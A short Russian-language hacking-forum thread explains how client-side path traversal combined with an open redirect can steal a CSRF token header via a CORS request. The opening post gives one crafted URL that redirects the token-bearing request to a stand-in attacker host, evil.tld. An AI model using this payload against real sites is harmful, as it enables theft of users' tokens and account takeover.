Загрузка...

About client-side path traversal

Thread in Web vulnerabilities created by PowerDevil Mar 28, 2024. 316 views

  1. PowerDevil
    PowerDevil Topic starter Mar 28, 2024 12,725 Aug 27, 2022
    [IMG]
    Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
    Например, если приложение через
    ⁡fetch()
    ⁡ добавляет заголовок
    ⁡csrfToken
    ⁡при обращении к
    ⁡/api/user,
    ⁡ то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на
    ⁡/api/user/../redirect?to=evil.tld/corsAllow
    ⁡​
     
  2. WhatACat
    WhatACat Mar 28, 2024 https://lolz.live/account/upgrades покупайте уники, ау, автобай 17,504 Dec 16, 2023
    По-моему недавно видел подобную тему уже
     
    1. PowerDevil Topic starter
      WhatACat, вчера делал
      Хотел внести изменение чет тема кажись баганула решил пересоздать
Loading...
Top